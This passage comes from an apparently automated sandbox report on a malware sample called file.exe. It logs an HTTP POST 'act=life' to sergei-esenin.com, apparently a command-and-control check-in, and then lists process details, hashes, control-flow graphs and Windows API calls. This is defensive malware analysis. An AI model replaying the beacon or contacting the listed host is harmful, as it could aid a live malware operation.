                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 8
                                                                            Host: sergei-esenin.com
                                                                            2024-10-08 09:18:17 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                            Data Ascii: act=life
                                                                            2024-10-08 09:18:17 UTC780INHTTP/1.1 200 OK
                                                                            Date: Tue, 08 Oct 2024 09:18:17 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=910tb38fnk86l3a32kepl239o2; expires=Sat, 01 Feb 2025 03:04:56 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=md5f2OvjgyZYGw0WtNf0MOxO5G%2FNvSQ3ME%2FXy2AFdTGcBplcpxKm1HR4mhgYL2FmoheNM%2FdJjcb%2Fj0Bmr%2FlhXJCWjo2Kf6ouu0OBXLumRR1PttBnCefF8q5ApATZJshwrPhH%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8cf50aed1c284243-EWR
                                                                            2024-10-08 09:18:17 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                            Data Ascii: aerror #D12
                                                                            2024-10-08 09:18:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            System Behavior

                                                                            General

                                                                            Target ID:1
                                                                            Start time:05:18:12
                                                                            Start date:08/10/2024
                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                            Imagebase:0xa80000
                                                                            File size:1'862'144 bytes
                                                                            MD5 hash:F6573E376463C493395A0189BD5B6A54
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:1%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:62.7%
                                                                              Total number of Nodes:51
                                                                              Total number of Limit Nodes:5
                                                                              execution_graph 21243 abd9cb 21245 abd9fb 21243->21245 21244 abda65 21245->21244 21247 ac5bb0 LdrInitializeThunk 21245->21247 21247->21245 21248 ac626a 21250 ac628d 21248->21250 21249 ac636e 21252 ac62de 21250->21252 21255 ac5bb0 LdrInitializeThunk 21250->21255 21252->21249 21254 ac5bb0 LdrInitializeThunk 21252->21254 21254->21249 21255->21252 21256 a8fca0 21259 a8fcdc 21256->21259 21257 a8ffe4 21259->21257 21260 ac3220 21259->21260 21261 ac32ac 21260->21261 21262 ac32a2 RtlFreeHeap 21260->21262 21263 ac3236 21260->21263 21261->21257 21262->21261 21263->21262 21264 ac3202 RtlAllocateHeap 21265 ac673d 21266 ac66aa 21265->21266 21267 ac6793 21266->21267 21270 ac5bb0 LdrInitializeThunk 21266->21270 21269 ac67b3 21270->21269 21271 a9049b 21275 a90227 21271->21275 21273 ac5700 2 API calls 21276 a90308 21273->21276 21274 a90455 21274->21273 21275->21274 21275->21276 21277 ac5700 21275->21277 21278 ac571b 21277->21278 21279 ac5797 21277->21279 21281 ac578c 21277->21281 21283 ac5729 21277->21283 21278->21279 21278->21281 21278->21283 21280 ac3220 RtlFreeHeap 21279->21280 21280->21281 21281->21274 21282 ac5776 RtlReAllocateHeap 21282->21281 21283->21282 21284 ac64b8 21286 ac63f2 21284->21286 21285 ac646e 21286->21285 21288 ac5bb0 LdrInitializeThunk 21286->21288 21288->21285 21289 ac50fa 21290 ac5176 LoadLibraryExW 21289->21290 21292 ac514c 21289->21292 21291 ac518c 21290->21291 21292->21290 21298 a8d110 21300 a8d119 21298->21300 21299 a8d2ee ExitProcess 21300->21299 21314 ac60d2 21315 ac60fa 21314->21315 21316 ac614e 21315->21316 21320 ac5bb0 LdrInitializeThunk 21315->21320 21319 ac5bb0 LdrInitializeThunk 21316->21319 21319->21316 21320->21316

                                                                              Executed Functions

                                                                              Function 00AC50FA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 25 ac50fa-ac514a 26 ac514c-ac514f 25->26 27 ac5176-ac5186 LoadLibraryExW 25->27 28 ac5150-ac5174 call ac5a50 26->28 29 ac518c-ac51b5 27->29 30 ac52d8-ac5304 27->30 28->27 29->30
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(19A41BB1,00000000,00000800), ref: 00AC5182
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: <I$)$<I$)$@^
                                                                              • API String ID: 1029625771-935358343
                                                                              • Opcode ID: 304ad092c5000a6e9e40bad75dbfea395f9a2d74d2bc4457841df944e60e5030
                                                                              • Instruction ID: f14e6016bcc30a11c3e00ce52972332d6d24d5184192108902d2486c4e5c6ad8
                                                                              • Opcode Fuzzy Hash: 304ad092c5000a6e9e40bad75dbfea395f9a2d74d2bc4457841df944e60e5030
                                                                              • Instruction Fuzzy Hash: 1F21A1755093848FC700DFA8D880B6AB7E4AB5A300F69482CE1C6D7351D735D955CB56
                                                                              Function 00A8FCA0 Relevance: 5.4, Strings: 4, Instructions: 373COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 33 a8fca0-a8fcda 34 a8fd0b-a8fe22 33->34 35 a8fcdc-a8fcdf 33->35 37 a8fe5b-a8fe8c 34->37 38 a8fe24 34->38 36 a8fce0-a8fd09 call a92690 35->36 36->34 41 a8fe8e-a8fe8f 37->41 42 a8feb6-a8fec5 call a90b50 37->42 40 a8fe30-a8fe59 call a92760 38->40 40->37 46 a8fe90-a8feb4 call a92700 41->46 47 a8feca-a8fecf 42->47 46->42 50 a8ffe4-a8ffe6 47->50 51 a8fed5-a8fef8 47->51 55 a901b1-a901bb 50->55 53 a8fefa 51->53 54 a8ff2b-a8ff2d 51->54 56 a8ff00-a8ff29 call a927e0 53->56 57 a8ff30-a8ff3a 54->57 56->54 59 a8ff3c-a8ff3f 57->59 60 a8ff41-a8ff49 57->60 59->57 59->60 62 a8ff4f-a8ff76 60->62 63 a901a2-a901ad call ac3220 60->63 65 a8ff78 62->65 66 a8ffab-a8ffb5 62->66 63->55 70 a8ff80-a8ffa9 call a92840 65->70 67 a8ffeb 66->67 68 a8ffb7-a8ffbb 66->68 72 a8ffed-a8ffef 67->72 71 a8ffc7-a8ffcb 68->71 70->66 75 a9019a 71->75 76 a8ffd1-a8ffd8 71->76 72->75 77 a8fff5-a9002c 72->77 75->63 78 a8ffda-a8ffdc 76->78 79 a8ffde 76->79 80 a9005b-a90065 77->80 81 a9002e-a9002f 77->81 78->79 84 a8ffc0-a8ffc5 79->84 85 a8ffe0-a8ffe2 79->85 82 a900a4 80->82 83 a90067-a9006f 80->83 86 a90030-a90059 call a928a0 81->86 88 a900a6-a900a8 82->88 87 a90087-a9008b 83->87 84->71 84->72 85->84 86->80 87->75 91 a90091-a90098 87->91 88->75 92 a900ae-a900c5 88->92 93 a9009a-a9009c 91->93 94 a9009e 91->94 95 a900fb-a90102 92->95 96 a900c7 92->96 93->94 99 a90080-a90085 94->99 100 a900a0-a900a2 94->100 97 a90130-a9013c 95->97 98 a90104-a9010d 95->98 101 a900d0-a900f9 call a92900 96->101 103 a901c2-a901c7 97->103 102 a90117-a9011b 98->102 99->87 99->88 100->99 101->95 102->75 105 a9011d-a90124 102->105 103->63 107 a9012a 105->107 108 a90126-a90128 105->108 109 a9012c-a9012e 107->109 110 a90110-a90115 107->110 108->107 109->110 110->102 111 a90141-a90143 110->111 111->75 112 a90145-a9015b 111->112 112->103 113 a9015d-a9015f 112->113 114 a90163-a90166 113->114 115 a90168-a90188 call a92030 114->115 116 a901bc 114->116 119 a9018a-a90190 115->119 120 a90192-a90198 115->120 116->103 119->114 119->120 120->103
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: J|BJ$V$VY^_$t
                                                                              • API String ID: 0-3701112211
                                                                              • Opcode ID: d7e71158c22e05dee6f706f2552bc7684c1dd6eec3485d5c4e87bf8f48944a2a
                                                                              • Instruction ID: e3aafe6992af1aa19624f12ea820307cc2750853febab9e832eb9cd675da6ff1
                                                                              • Opcode Fuzzy Hash: d7e71158c22e05dee6f706f2552bc7684c1dd6eec3485d5c4e87bf8f48944a2a
                                                                              • Instruction Fuzzy Hash: 3BD1777460C3919FD710DF189590A1FBBE1AF96B84F28892CF5C98B252C336CD49DB92
                                                                              Function 00A8D110 Relevance: 1.7, APIs: 1, Instructions: 168COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 157 a8d110-a8d11b call ac4cc0 160 a8d2ee-a8d2f6 ExitProcess 157->160 161 a8d121-a8d130 call abc8d0 157->161 165 a8d2e9 call ac56e0 161->165 166 a8d136-a8d15f 161->166 165->160 170 a8d161 166->170 171 a8d196-a8d1bf 166->171 174 a8d170-a8d194 call a8d300 170->174 172 a8d1c1 171->172 173 a8d1f6-a8d20c 171->173 176 a8d1d0-a8d1f4 call a8d370 172->176 177 a8d239-a8d23b 173->177 178 a8d20e-a8d20f 173->178 174->171 176->173 182 a8d23d-a8d25a 177->182 183 a8d286-a8d2aa 177->183 181 a8d210-a8d237 call a8d3e0 178->181 181->177 182->183 188 a8d25c-a8d25f 182->188 184 a8d2ac-a8d2af 183->184 185 a8d2d6 call a8e8f0 183->185 189 a8d2b0-a8d2d4 call a8d490 184->189 195 a8d2db-a8d2dd 185->195 192 a8d260-a8d284 call a8d440 188->192 189->185 192->183 195->165 198 a8d2df-a8d2e4 call a92f10 call a90b40 195->198 198->165
                                                                              APIs
                                                                              • ExitProcess.KERNEL32(00000000), ref: 00A8D2F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ExitProcess
                                                                              • String ID:
                                                                              • API String ID: 621844428-0
                                                                              • Opcode ID: cc93910a2f72e04d326392ffac5765f21f0a8006aeddfdf62bbf0960882afc14
                                                                              • Instruction ID: dbcea1ca451f19b4fc7c8e1ae4af6d0c44cafe0201bc9faf41973ab3a48704bc
                                                                              • Opcode Fuzzy Hash: cc93910a2f72e04d326392ffac5765f21f0a8006aeddfdf62bbf0960882afc14
                                                                              • Instruction Fuzzy Hash: 5141447040D380ABC701BB68D688E2EFBF5AF52744F148C1CE5C49B292D336D8148B67
                                                                              Function 00AC5700 Relevance: 1.6, APIs: 1, Instructions: 69memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 202 ac5700-ac5714 203 ac578c-ac5795 call ac31a0 202->203 204 ac5729-ac574a 202->204 205 ac571b-ac5722 202->205 206 ac5797-ac57a5 call ac3220 202->206 207 ac57b0 202->207 208 ac57b2 202->208 210 ac57b4-ac57b9 203->210 211 ac574c-ac574f 204->211 212 ac5776-ac578a RtlReAllocateHeap 204->212 205->204 205->206 205->207 205->208 206->207 207->208 208->210 216 ac5750-ac5774 call ac5b30 211->216 212->210 216->212
                                                                              APIs
                                                                              • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 00AC5784
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 7fe0f4dd981670826508064ba88a70c119d6422c452b09ed208953b5461034e6
                                                                              • Instruction ID: e433a65d5079af2632e2e0a706f178b00b153cbdb5d00d960f20454cbde5e6e9
                                                                              • Opcode Fuzzy Hash: 7fe0f4dd981670826508064ba88a70c119d6422c452b09ed208953b5461034e6
                                                                              • Instruction Fuzzy Hash: 84118C7591D240EBC701AF28E944E1BBBF5AF96710F06882CF4859B211D335E851CB93
                                                                              Function 00AC5BB0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 229 ac5bb0-ac5be2 LdrInitializeThunk
                                                                              APIs
                                                                              • LdrInitializeThunk.NTDLL(00AC973D,005C003F,00000006,?,?,00000018,8C8D8A8B,?,?), ref: 00AC5BDE
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                              • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                              • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                              • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                              Function 00AC695B Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 258 ac695b-ac696b call ac4a20 261 ac696d 258->261 262 ac6981-ac6a02 258->262 263 ac6970-ac697f 261->263 264 ac6a04 262->264 265 ac6a36-ac6a42 262->265 263->262 263->263 266 ac6a10-ac6a34 call ac73e0 264->266 267 ac6a44-ac6a4f 265->267 268 ac6a85-ac6a9f 265->268 266->265 269 ac6a50-ac6a57 267->269 271 ac6a59-ac6a5c 269->271 272 ac6a60-ac6a66 269->272 271->269 274 ac6a5e 271->274 272->268 275 ac6a68-ac6a7d call ac5bb0 272->275 274->268 277 ac6a82 275->277 277->268
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @
                                                                              • API String ID: 0-2766056989
                                                                              • Opcode ID: 656d23e3e59555f06d6e7c83ddd09a39d8ae91281847dc0afdc8f4bb9f17fa81
                                                                              • Instruction ID: 8593ba006eec75f237223259c42d83440656b9e44e01d475cf54068694dffe77
                                                                              • Opcode Fuzzy Hash: 656d23e3e59555f06d6e7c83ddd09a39d8ae91281847dc0afdc8f4bb9f17fa81
                                                                              • Instruction Fuzzy Hash: 7B318BB19183019FD718DF25C8A0B2BB7F1FF89384F58981DE5C697261E3349904CB56
                                                                              Function 00A9049B Relevance: .3, Instructions: 264COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 278 a9049b-a90515 call a8c9f0 282 a90308-a9030c 278->282 283 a903ec-a903f4 278->283 284 a90440-a90458 call ac5700 278->284 285 a90480 278->285 286 a90242-a90244 278->286 287 a90482-a90484 278->287 288 a90227-a9023b 278->288 289 a90246-a90260 278->289 290 a90386-a9038c 278->290 291 a90339-a9034f 278->291 292 a9045b-a90469 call ac5700 278->292 293 a903fb-a90414 278->293 294 a9051c-a9051e 278->294 295 a9035f-a90367 278->295 296 a903be 278->296 297 a903de-a903e3 278->297 298 a90311-a90320 278->298 299 a90370-a9037e 278->299 300 a903d0-a903d7 278->300 301 a90393-a90397 278->301 302 a90472-a90477 278->302 303 a90417-a90430 278->303 304 a90356 278->304 306 a9048d-a90496 282->306 283->285 283->287 283->293 283->301 283->302 284->292 309 a90296-a902bd 286->309 287->306 288->282 288->283 288->284 288->285 288->286 288->287 288->289 288->290 288->291 288->292 288->293 288->295 288->296 288->297 288->298 288->299 288->300 288->301 288->302 288->303 288->304 310 a90262 289->310 311 a90294 289->311 290->285 290->287 290->301 290->302 291->283 291->284 291->285 291->287 291->290 291->292 291->293 291->295 291->296 291->297 291->299 291->300 291->301 291->302 291->303 291->304 292->302 293->303 308 a90520-a90b30 294->308 295->299 296->300 297->283 315 a90327-a90332 298->315 299->290 300->283 300->285 300->287 300->290 300->293 300->297 300->301 300->302 300->303 317 a903a0-a903b7 301->317 302->285 303->284 304->295 306->308 319 a902ea-a90301 309->319 320 a902bf 309->320 318 a90270-a90292 call a92eb0 310->318 311->309 315->283 315->284 315->285 315->287 315->290 315->291 315->292 315->293 315->295 315->296 315->297 315->299 315->300 315->301 315->302 315->303 315->304 317->283 317->284 317->285 317->287 317->290 317->292 317->293 317->296 317->297 317->300 317->301 317->302 317->303 318->311 319->282 319->283 319->284 319->285 319->287 319->290 319->291 319->292 319->293 319->295 319->296 319->297 319->298 319->299 319->300 319->301 319->302 319->303 319->304 322 a902c0-a902e8 call a92e70 320->322 322->319
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2ce51e96c5af0b6577e8939522d2890984b99a59f3160826fd81404282e7d535
                                                                              • Instruction ID: 924c45952b4dcc7fe4044d747daa28098ea3741b0a79f1be602bfdb3a5e824e5
                                                                              • Opcode Fuzzy Hash: 2ce51e96c5af0b6577e8939522d2890984b99a59f3160826fd81404282e7d535
                                                                              • Instruction Fuzzy Hash: 23917A75200B00CFD724CF65E894E16B7F6FF89710B118A6DE8568BAA1D730E816CB50
                                                                              Function 00A90228 Relevance: .2, Instructions: 218COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b1fc5f8a449fc72fda4bd57a3a647787dfc22b45f8617201fd0dda531b1a5d50
                                                                              • Instruction ID: 8c5c5d86deb6a2ddbc63992a0aa7eb26d01f581902149799c415af406b28897a
                                                                              • Opcode Fuzzy Hash: b1fc5f8a449fc72fda4bd57a3a647787dfc22b45f8617201fd0dda531b1a5d50
